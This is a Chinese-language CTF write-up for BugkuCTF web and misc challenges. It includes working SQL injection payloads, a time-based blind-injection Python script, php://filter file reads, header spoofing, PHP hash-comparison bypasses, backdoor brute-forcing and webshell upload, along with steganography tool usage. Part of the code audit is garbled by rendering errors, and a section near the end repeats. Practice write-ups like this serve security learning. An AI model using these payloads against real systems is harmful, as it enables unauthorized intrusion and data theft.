BugkuCTF——wp
1、直接按F12即可找到
1、按下F12发现它对输入框的长度进行了限制,先将长度调大
2、在计算给出的题点击验证即可。
1、提交数据方式为GET传参,所以直接what=flag即可
参考playload:http://123.206.87.240:8002/get/?what=flag
1、此题是POST传参,来提交数据的所以我们利用Hackbar传参即可得到Flag
1、读代码发现判断num是否为数字1,不是则输出数字1,这样看起来是自相矛盾的所以我们可以让一个是1但不一定是纯数字型的1。
请参考playload:http://123.206.87.240:8002/get/index1.php?num=1a.5616
1、点击进去后出来弹窗,按F12后进入到Sources中进入首页发现有许多的JS,但最后有一串很特殊的字符,通过Unicode解码发现Flag。
2、或者直接将此特殊字符复制到新建对话框中,浏览器自动解析出Flag。
1、这题刚开始打开是没啥头绪的,查看了一些资料和相关的题目后进行尝试,最后发现在Windows中找到C:\Windows\System32\drivers\etc\hosts
在利用TXT打开它,在后面增加一条123.206.87.240 flag.baidu.com
保存即可。
2、在打开浏览器访问flag.baidu.com
即可得到Flag。
1、通过抓包,抓取数据包,在到Repeater中进行查找Flag,点击Go,将网页格式改为HTML方便查看Flag,最终查到Flag。
网页打开后没有任何显示
1、首先代码审计
error_reporting(0); ( 代表关闭报错提示 )
include “flag1.php”;( 包含文件 flag1.php )
highlight_file(file);( 对文件进行语法高亮显示 )
if(isset($_GET[‘args’])){ ( 条件判断 get方法传递的args参数是否存在存在为真 )
$args = $_GET[‘args’];( 赋值给变量 KaTeX parse error: Undefined control sequence: \w at position 32: …!preg_match("/^\̲w̲+/",$args)){( 正则表达式判断 ) if条件判断 KaTeX parse error: Expected 'EOF', got '}' at position 79: …error! )** **}̲** **eval("va…$args);");( eval()函数 将字符串作为php代码执行结尾加分号 )
}
1、首先查看了下源代码,发现有一大串特殊的符号,利用在线解码器发现没有任何用,于是放在了控制台中回车出现了Flag。
1、打开网页发现真的什么都没有,检查源码发现有个id为wordTrans2008342469
所以可以推断出,这个网页还是有东西的。
2、利用抓包软件抓包,发现在数据头中真的有点东西,即得到Flag。
1、首先查看源代码,发现没有任何有关信息,我们用御剑进行后台扫描,发现了一个shell.php的网站,打开它发现需要密码。
2、利用抓包,进行暴力破解,这个过程需要很长的时间,最后发现有个长度不一样的,那个就是后门密码。
3、在得到的shell网站中输入后门密码得到Flag。
1、打开网站后发现是一个登录界面,我们按F12发现一串特殊的代码,我们利用HackBar中的Base64解码得到 test123 于是猜测这个有可能是密码,进行尝试显示的是 IP禁止访问,请联系本地管理员登陆,IP已被记录. 本地管理员,意思是需要通过本地管理员才可以,查询了一下发现X-Forwarded-For东西, 代表客户端,作用是获得HTTP请求端真实的IP。
2、我们伪造一个请求头,在发送得到Flag。
1、进入网页首先看到他让我们查看源代码,按F12进行查看,发现在JS中有个很特别的字符串,我们尝试用URL进行解码,发现了他的源代码,进行审计发现他让我们将p1中if里的字符串与p2和p2之前的字符串进行结合,结合后将得到的字符串输入到对话框中,得到Flag。
1、进入网站后,发现只有个A链接,点后发现跳转后的网页里没有任何的异常之处,审题目发现Flag在首页中,我们构造playload,http://123.206.87.240:8005/post/index.php?file=index.php
发现进入的首页是空白的,此时想到有可能是加密的网页。
2、对网页进行Base64解密http://123.206.87.240:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php
成功进入首页后发现了一串代码,利用Base64解码得到源码,发现Flag就在源码中。
1、打开首页发现是一个五位数纯数字密码,利用BurpsuiteUnlimited进行暴力破解,破解过程有点漫长,最终得到密码13579
2、输入密码,得到Flag
1、打开网页发现有一串字母,对它进行各种解密发现没啥用,仔细看发现他是一个相同的字符串组合在一起的,题目让我们养成备份的好习惯,那我们就找下有没有.bak
后缀的备份文件,发现在网页中是找不到的。
2、所以利用御剑去扫描他的后台,发现了一个http://123.206.87.240:8002/web16/index.php.bak
的网址,打开它后下载下来,用记事本打开发现里面有个很像Flag的东西,代码审计发现使用MD5进行加密的。
3、我们尝试绕过, parse_str()函数,它的作用是将字符串解析到变量中
4、构造playloadkkeyey1[]=1&kkeyey2[]=2
,之后会发现Flag。
请参考playload:http://123.206.87.240:8002/web16/?kkeyey1[]=a&kkeyey2[]=b
1、这道题是典型的注入题。
(1)首先输入1
再输入2
再输入3
再输入4
由此说明有三个字段
(2)尝试手动注入
输入1’ 报错
输入1‘–+ 报错
输入1’# 无报错
输入1’+ 报错
说明±- 都被过滤掉了
(3)尝试看数据库有几列
1 2 3 4所对应的是 姓名 Math English Chinese
利用 Order By 查看有几列
1’ order by 4# 回显正常
1‘order by 5# 回显异常
所以可以确定有四列
(4)接下来开始 爆库 爆表 爆字段
构造id=-1’ union select 1,2,3,4# 回显正常
查看数据库名称
构造 id=-1’ union select 1,2,3,database()# 回显正常
查看表名
id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 回显正常
爆字段名
id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#
这里需要用到16进制的编码来绕过,Flag是敏感信息有可能会被过滤掉,为了稳妥直接利用16进制绕过。
经过验证Flag被过滤掉了
playload:id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=fl4g.sc#
回显异常
最后查询数据
playload: id=-1’ union select 1,2,3,skctf_flag from fl4g#
1、打开首页发现有一串很长的字符串,进行解密,发现没啥用,注意到了URL中的filename=a2V5cy50eHQ=
filename后面的看起来有点古怪,利用base64进行解码,发现是 keys.txt 。尝试filename后面访问首页index.php,这里利用base64对index.php进行编码,发现没有啥变化,重新审URL发现里面有个line行数。
2、在行数后面添加数字,发现出现代码,怀疑有可能是源码,通过一行一行的审计,发现必须满足if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
margin=margin 才可以访问 key.php,再将key.php进行base64编码。
3、执行后是空白的,检查源代码,发现Flag。
方法二、
之前的方法跟步骤1 2 一样,但在解码后的步骤有些不一样,利用BurpUnlimited抓包,再将Cookie改为Cookie:margin=margin,GO即可得到Flag。
1、代开网站后查看源代码发现没啥特别的,再看URL,发现在URL中有个id=1的东西,再看源代码中也有一个和他很像的字符,将源代码中的字符放到id=的后面执行,发现没有啥用.
playload:view-source:http://123.206.87.240:8006/test/hello.php?id=1p.html
再将hello.php与id=删除,执行后面的1p.html网页,发现网页跳转了,尝试查看源代码,发现是bugku的网站,想办法让它不跳转网页,在之前playload的网页中直接查看源代码,在源代码的URL中进行执行,网页未跳转但发现了一串字符串,尝试用URL进行解码,再用base64进行解码,在用URL进行解码,得到源代码,审计后发现只需要访问 f4l2a3g.txt 即可得到Flag。
注:只需要制框内的代码进行解密即可。
解码顺序:URL==》base64==》URL
参考playload:view-source:http://123.206.87.240:8006/test/f4l2a3g.txt
1、这是一道正则题,打开首页发现他直接把源代码给你了。
2、尝试审计
(1) /代表匹配的开始与结束两个/里面的内容就是要匹配的内容
**(2) .代表数字匹配任意数字,代表匹配0-n次两者结合.就是匹配任一个数字任意次
(3) {4,7}表示匹配前一个字符4到7次
(4) \表示要找\后面的内容,/./就是找/数字/
(5) [a-z]就是匹配a-z之间的字符
(6) [[:punct:]]代表任意标点
(7) i代表字体大小
正则表达字符含义:https://www.cnblogs.com/afarmer/archive/2011/08/29/2158860.html
请参考playload:key2key2222key:/2/2keya.
1、首先观察打开的页面,发现没有任何特别的地方,查看源码 无果。
2、抓包没有任何的特别,判断需要在这里添加一个请求头部。
3、伪造一个头部,去请求 google 。
注:referer 表示一个来源。
参考playload:referer: https://www.google.com
1、首先进入首页,发现有行英文意思为请输入一个
。查看源代码 无果
2、尝试用BP抓包 无果
3、在解读题目
md5碰撞
发现需利用 0E开头的字符串进行绕过。
其原理为:在PHP中处理哈希字符串时会利用”!= & ”==”对哈希值进行比较它把每一个以”0E”开头的哈希值都 解释为0,以如果两个不同的密码经过哈希以后,哈希值都是以”0E”开头的,么PHP将会认为他们相同,都是0。
本题原理为利用 0E 字符串,如果在数据库中有哈希值 0E 开头的密码就可以,以这个用户的身份登陆进去。
尽管没有正真的密码。
4、尝试在URL里进行绕过。
参考playload:http://123.206.87.240:9009/md5.php?a=s1836677006a
注:a此后的0E值是可以改变的。
部分哈希值:
0e开头的md5和原值:
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
1、打开网站 查看源码 无果
2、利用BP抓包,任何发现 题目说本地网站,意思是要从本地去访问
3、构造请求头X-Forwarded-For:127.0.0.1
继续访问得到Flag
参考playload:X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载 均衡服务器时才会添加该项。
1、打开网页发现源码
2、源码审计
id、uname通过get方法传值,passwd通过post方法传值且如果想要进入内层循环必须传入uname和passwd
uname和passwd弱类型不相等
uname和passwd加密后的值强相等
id字段url解码后=‘margin’
只要使uname的sha1的值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等 ,这里就得需要
sha1函数无法处理数组的特性, 当对sha1()函数传入数组时会返回null,由此,只需要传入两个不同的数组即可成功 绕过。 得到Flag
构造payload:http://123.206.87.240:8002/web7/?uname[]=1&id=margin
在post data 中passwd[]=2
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IFU8LoBm-1608735278117)(E:\1-信息安全暑期培训\CTF自学\Bagku\BugkuCTF—wp.assets\1598082656479.png)]
1、打开首页发现源码,源码审计
This is flag:" ." $flag";
}
else
{
echo "sorry!
";
}
}
?>
extract() -使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应 的一个变量.
empty()-判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于FALSE,那么它会被认为不存 在。如果变量不存在的话,empty()并不会产生警告。
trim()-移除字符串两侧的空白字符或其他预定义字符。
file_get_contents-将整个文件读入一个字符串
2、分析得到
(1)可能有txt文件
(2)尝试发现:含有flag.txt文件,打开后有个Flags
playload:http://123.206.87.240:8002/web8/flag.txt
3、构造playload:http://123.206.87.240:8002/web8/?ac=flags&fn=flag.txt
1、打开网站后发现是一个模拟404的网站,刚开始还有点信。查看源码发现了两个链接。点击无果
2、利用BP抓包,发现没有任何信息。
3、利用御剑扫描一下后台,发现了一个http://123.206.87.240:8002/web13/robots.txt
URL
(1)打开这个网站后
(2)发现只有
User-agent:
Disallow: /resusl.php
(3)将resusl.php
放到/web13/的后面尝试访问
还有一行PHP代码
(5)刚进入网页时,题目提醒 想办法变成admin ,所以尝试GET传参 x=admin 得到Flag
4、参考playload:http://123.206.87.240:8002/web13/resusl.php?x=admin
1、打开网页查看源代码 无果
2、打开BP抓包,我们上传的是一句话图片木马,刚开始想他让我们上传图片那图片类型不用更改,图片后缀不用更 改。
3、最后做出来发现图片后缀可以添加也可以更改但必须是“.php5”的后缀。这里是经过许多的尝试才得到的。
4、最后得到Flag
1、打开题目发现他把源码直接放在了题目中
接下来代码审计
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
发现,在10行的时候$ip被截取了
.explode函数的作用是按规则拆分为数组.例如:explode(" ",$str)
明确注入点是HTTP头,尝试利用 x-forwarded-for 来进行注入,但过程中发现逗号被过滤了。
在mysql中与if具有相同效果的是:
select case when (条件) then 代码1 else 代码 2 end;
而且由于逗号,被过滤,我们就不能使用substr、substring了,但我们可以使用:from 1 for 1
参考playload:
127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a'then sleep(5) else 0 end))--+
利用python脚本:
# -*- coding:utf-8 -*-
import requests
import sys
# 基于时间的盲注,过滤了逗号 ,
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://120.24.86.145:8002/web15/'
flag = ''
for i in range(1, 40):
print('正在猜测:', str(i))
for ch in range(32, 129):
if ch == 128:
sys.exit(0)
sqli = sql.format(i, chr(ch))
# print(sqli)
header = {
'X-Forwarded-For': sqli
}
try:
html = requests.get(url, headers=header, timeout=3)
except:
flag += chr(ch)
print(flag)
break
得到Flag:
flag{cdbf14c9551d5be5612f7bb5d2867853}
1、
2、
1、下载压缩包,解压,发现里面有一个流量包,用wireshark打开该流量包
2、右键追踪即可得到flag
1、首先把压缩包下载下来,发现没有前缀
2、尝试给他添加一个前缀名1.zip
3、发现可以运行,打开他有一个doxc
文件,尝试打开发现提示打开错误
4、我们再将这个的后缀该为压缩文件.zip
5、发现可以运行并打开他
6、里面有一大堆的.xml
为后缀的文件,利用记事本打开去查询flag
7、最后在众多文件中找到了flag,他就藏在文件中
1、打开网站是一张图片,有一个女人的半张脸
2、这道题给的提示就是让我们猜这个人的名字,虽然是个明星但本人不认识。
3、打开百度识图发现是刘亦菲
1、将bin文件下载下来
2、百度查阅了下打开bin文的软件,在windows下是 RouterPassView 软件查看配置文件
3、将bin文件用它打开,利用快捷键进行查找宽带的用户名` ctrl+F 查看 username 即可得到flag
RouterPassView下载地址: http://99idc.jb51.net:81/201206/tools/routerpassview_jb51net.rar
RouterPassView:RouterPassView – 路由密码查看
RouterPassView是 NirSoft 出品的一款路由密码恢复软件,可以查看绝大多数家用路由的配置文件中保存的密码,使用时只需要RouterPassView 打开导出的路由配置文件即可。
1、打开题目将压缩包下载下来
2、解压后尝试打开.exe文件发现打不开
3、题目提示说做题过程中有可能会出现二维码,将解压后的文件放到文本里发现有可能是base64编码,百度搜索base64转图片,将字符串放入转化得到二维码,扫描二维码得到flag
1、打开题目发现是一个二维码动图,利用Stegsolve对gif进行浏览每一帧
2、用手机去扫码一个一个扫得到flag
注:下划线扫码得到的是一个刚,记得改为下划线
stegsolve下载地址:http://www.caesum.com/handbook/Stegsolve.jar
stegsolve安装配置:配置好Java环境变量
stegsolve功能简介: https://www.cnblogs.com/dzkwwj/p/9473357.html
1、打开题目下载文件,添加后缀.jpg显示图片
2、打开图片只有一个鸽子的图案
3、尝试将图片方进文本文档,查找Flag无果
4、再利用WinHex进行查看发现最后一行有个很特别的
一串字符
5、经过一些查找发先这是一个 栅栏密码 ,将他进行栅栏解密
6、解密过程中他会有选择每组字数
的初始为2
2 : f3g_2oi@vaywo_}_lr{c2ls@
3 : flag{w22_is_v3ry_cool}@@
4 : fo3_g}__2lori{@cv2alysw@
5 : fy2@rgosac2}3wlil__@v{o_
6 : fvl3argy{ wc2o2o_li}s@@
尝试到六已经出来了,每组字数为三即可得到Flag
注:栅栏密码——密码学—加密学
加密原理详解参考:https://baike.baidu.com/item/%E6%A0%85%E6%A0%8F%E5%AF%86%E7%A0%81/228209?fr=aladdin
所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话。 不过栅栏密码本身有一个潜规则,就是组成栅栏的字母一般不会太多。(一般不超过30个,也就是一、两句话)
1、将图片放到Win Hex里更改长度让他成为一个正方形
2、得到flag
1、将图片放到Win Hex里发现有隐藏文件
2、用kali的binwalk将文件分离
3、有个压缩包,里面的文件有密码,刚开始使用fcrackzip发现无果
4、在windos下发现刚开始的图片属性里有个16进制的编码,解码得到压缩包密码
5、即可得到flag
1、现右击查看属性无果
2、放进Win Hex里查看无果
3、放进kali里用binwalk查看有文件存在
4、刚开始利用binwalk -e进行分离发现没有用
5、百度发现有一个命令 foremost 可以将图片中的文件分离
6、即可得到flag
注: foremost用法
foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t ] [-s ] [-k ] [-b ] [-c ] [-o ] [-i
或 foremost + 文件名
1、将图片放进kali里利用binwalk分离
2、发现是个加密压缩包利用windos的rar暴力破解软件破解得到密码
3、打开有张图,利用txt打开他搜索f在最后一行
4、是个base64加密答案,解密得到flag但提交格式为f1@g{y0u Are a h@cker!},尝试了很久才发现心累。
1、点击游戏现玩下,退出后发现有了文件
2、将为文件尝试放进WinHex里去解读
3、发现有个位置是控制关卡的将他改为5,重新打开游戏即可得到flag
方法一、
1、解压后有个无后缀的文件
2、放进kali里用strings来查看内容,发现flag、
注:strings的用法
strings [ -a ] [ - ] [ -o ] [ -t Format ] [ -n Number ] [ -Number ] [ file ... ]
`-a --all:扫描整个文件而不是只扫描目标文件初始化和装载段
-f –print-file-name:在显示字符串前先显示文件名
-n –bytes=[number]:找到并且输出所有NUL终止符序列
方法二、
解压直接用记事本打开搜索key
得到flag
方法三、
在kali里用cat flag
得到flag,flag就在最后面
1、将图片放到Win Hex里更改高度得到flag
1、打开游戏是个不可能过关的游戏,将窗口放大发现小方块可以到空白的地方躲避小绿帽子
2、结果没用,放进kali里利用binwalk查看,有隐藏文件,-e分离
3、尝试用grep指令进行查看内容,指令为grep -i “查找的字符” 文件名
4、得到flag的base64加密,解密得到flag
注:grep的用法https://www.cnblogs.com/lemon-feng/p/11249461.html
grep -i “test” test.txt 搜索出含有“test” 字符串(-i:不区分大小)
grep -i -n “test” test.txt 搜索出含有“test” 字符串(-i:不区分大小),并打印行号
grep -i -n --color “test” test.txt 搜索出含有“test” 字符串(-i:不区分大小),并打印行号,关键字“test”颜色标记(centos7系统默认为grep命令配置了别名,所以不使用—color也能显示颜色)
grep -I -c “test” test.txt,打印“test”字符串(不区分大小写)显示的次数
grep -I -o “test” test.txt,打印“test”字符串(不区分大小写),但不打印整行
grep -A1 “18” test2.txt,打印“18”字符串和它上一行的信息
grep -B1 “18” test2.txt,打印“18”字符串和它下一行的信息
grep -C1 “18” test2.txt,打印“18”字符串和它上一行和下一行的信息
grep -w “dlf” test.txt,精确匹配出“dlf”字符串的
grep -v “dlf” test.txt,匹配出不包含“dlf”字符串的行
grep -e ‘abc’ -e ‘dlf’ test.txt,同时匹配”abc”和”test”字符串
grep -q 静默模式
静默模式下grep不会输入任何信息,无论是否匹配到指定的字符串,都不会输出任何信息,所以配合使用“echo %?”命令,查看命令的执行状态,如果返回值0,证明上一条grep命令匹配到了指定的字符串,如果返回值1,则证明上一条grep命令没有匹配到指定的字符串。
1、打开流量包查看, WIFI连接认证的重点在WPA的四次握手包,也就是eapol协议的包,过滤一下
4、得到flag
1、将文件用kali的binwalk扫描一下发现有文件
2、用改命令工具分离,发现文件太多
3、用grep命令搜索KEY得到flag
1、将图片放进kali里查看有隐藏文件,分离
2、得到rar压缩包有密码尝试Windows下爆破无果
3、发现图像的属性里有一串base64加密字符串解密得到密码
4、将解密得到的图片放近Win Hex里更改高度,得到flag
1、将图片放进kali里分离隐藏文件
2、得到一个很奇怪的文件,里面全是数字8组成的文件无后缀
3、还有一个gif的动图,查看为无果
4、在88文件中 有个二维码扫描获得bilibili
5、在8888文件中隐藏了 一个二维码扫码获得panama
6、在888文件属性中发现有个base64加密字符串解密得到一部分flag
7、将之前得到的答案按顺序组合起来得到完整的flag` flag{bilibili_silisili_panama}
1、放到stegsolve里查看,在Data Extract里发现有个图片但文件头被添加了其他东西
2、将他保存为图片到Win Hex里删除头部添加的东西得到一半的二维码,在更改长度
3、得到完整的二维码,扫描得到一个网站,发现是百度云盘,将为文件下载下来
4、解压发现解压失败,当时以为是伪加密
5、结果是利用NTFS交换数据流隐藏文件
6、去网上查找资料得到相应的软件,利用它得到了一个.py
的文件
7、 直接丢到这。。https://tool.lu/pyc/
8、反编译放到python里跑下得到flag
注:推荐一个网站比较方便https://tool.lu/coderunner/
1、将图片放到Win Hex里无果
2、放到stegsolve里发现有个YSL字样
3、尝试用 Data Extract发现有个zip的包保存为zip发现文件需要密码
4、看见之前的 YSL字样百度发现是个口红的牌子
5、将给的图片利用吸管工具将16进制的颜色全部转化为2进制在转为字符
6、得到密码白学家
即可得到flag
1、利用MP3StegoDecode工具
2、命令如下
1)第一个是工具名 2)第二个是-X是获取隐藏的东西 3)第三个-P后面写密码 4)第四个是密码 5)第五个是要解密的音频
1、放进Win Hex里 发现尾部有一串数字
2、发现都是已1开头的,百度后发现是8进制数
3、写脚本将他变为8进制数并且转为 ascii 码得到flag
str = '146154141147173110141166145137171060125137120171137163143162151160164137117164143137124157137124145156137101163143151151041175'
flag = ''
a = int(len(str)/3)
for i in range(a):
flag += chr(int(str[i*3:i*3+3],8))
print(flag)
1、放进stegsolve里尝试用 Data Extract打开
2、发现 flag
1、将压缩包解压得到一个压缩包和图片
2、猜测有可能是明文攻击
3、 如下图所示:得到密码 q1w2e3r4
flag.zip作为密文压缩包
logo.zip作为明文压缩包
攻击类型:明文攻击
4、将flag.zip解压得到的word文件放进kali里分离出个文件在里面找flag
5、得到一个base64加密的文件,解密得到flag
FFC2
37 7A BC AF 27 1C
dd
1、用010打开图片,发现是由两张图片组成的,在两张图片的头尾交接处发现有一串二进制的数,尝试将他转为Ascii码得到一串字符mynameiskey!!!hhh
2、到这里思路断了,尝试去改高度,百度后发现JPG的高度是在16进制FFC2
处再往后三个字节就是图片大小尺寸
普通的JPG的图片大小尺寸都在FFC2
后三个字节处开始,总共就两个字节
3、发现新大陆,有flag但有一部分被隐藏了,放到kali里binwalk下出来两张图,改下大小发现跟原来的一样flag有几个打了马赛克,在到两张图里去看看有没有隐藏信息,发现在FFD9
图片结束尾部特征,二进制编码后面发现有个像 7z的文件标识头的东西,尝试去修复文件标识头改为37 7A BC AF 27 1C
保存再到kali里去
4、将这一段数据提取出来并保存为压缩包的格式命令为dd if=lunjian.jpg of=1.zip skip=9591 bs=1
得到压缩包解压,再将图片更改高度发现与之前的flag遮挡有错位,组合得到flag
kali里dd命令使用方法
使用dd命令分离文件,如:
dd if=hehe.jpg of=hehe1.zip bs=1 skip=54163
if=file(源文件)
of=file(输出文件)
bs=bytes(一次性转换bytes个字节,及转换缓冲区大小)
skip=blocks(输入文件开头跳过blocks个块再开始复制--通俗点讲就是从哪开始)
常见文件头标识
常见的文件头:
7z
文件头标识:37 7A BC AF 27 1C
JPEG/JPG
文件头标识: ff, d8 (SOI) (JPEG 文件标识)
文件结束标识: ff, d9 (EOI)
PNG
文件头标识:89 50 4E 47 0D 0A 1A 0A
GIF
文件头标识:47 49 46 38 39(37) 61 GIF89(7)a
BMP
文件头标识:42 4D--- BM
HTML (html)
文件头标识:68746D6C3E
ZIP Archive (zip)
文件头标识:504B0304 PK
RAR Archive (rar)
文件头标识:52617221
等等..
rd文件放进kali里分离出个文件在里面找flag**
5、得到一个base64加密的文件,解密得到flag
FFC2
37 7A BC AF 27 1C
dd
1、用010打开图片,发现是由两张图片组成的,在两张图片的头尾交接处发现有一串二进制的数,尝试将他转为Ascii码得到一串字符mynameiskey!!!hhh
2、到这里思路断了,尝试去改高度,百度后发现JPG的高度是在16进制FFC2
处再往后三个字节就是图片大小尺寸
普通的JPG的图片大小尺寸都在FFC2
后三个字节处开始,总共就两个字节
[外链图片转存中…(img-FC1IvBoC-1608735278163)]
3、发现新大陆,有flag但有一部分被隐藏了,放到kali里binwalk下出来两张图,改下大小发现跟原来的一样flag有几个打了马赛克,在到两张图里去看看有没有隐藏信息,发现在FFD9
图片结束尾部特征,二进制编码后面发现有个像 7z的文件标识头的东西,尝试去修复文件标识头改为37 7A BC AF 27 1C
保存再到kali里去
[外链图片转存中…(img-94LmHb9Z-1608735278164)]
4、将这一段数据提取出来并保存为压缩包的格式命令为dd if=lunjian.jpg of=1.zip skip=9591 bs=1
得到压缩包解压,再将图片更改高度发现与之前的flag遮挡有错位,组合得到flag
[外链图片转存中…(img-TLzba6ZW-1608735278166)]
kali里dd命令使用方法
使用dd命令分离文件,如:
dd if=hehe.jpg of=hehe1.zip bs=1 skip=54163
if=file(源文件)
of=file(输出文件)
bs=bytes(一次性转换bytes个字节,及转换缓冲区大小)
skip=blocks(输入文件开头跳过blocks个块再开始复制--通俗点讲就是从哪开始)
常见文件头标识
常见的文件头:
7z
文件头标识:37 7A BC AF 27 1C
JPEG/JPG
文件头标识: ff, d8 (SOI) (JPEG 文件标识)
文件结束标识: ff, d9 (EOI)
PNG
文件头标识:89 50 4E 47 0D 0A 1A 0A
GIF
文件头标识:47 49 46 38 39(37) 61 GIF89(7)a
BMP
文件头标识:42 4D--- BM
HTML (html)
文件头标识:68746D6C3E
ZIP Archive (zip)
文件头标识:504B0304 PK
RAR Archive (rar)
文件头标识:52617221
等等..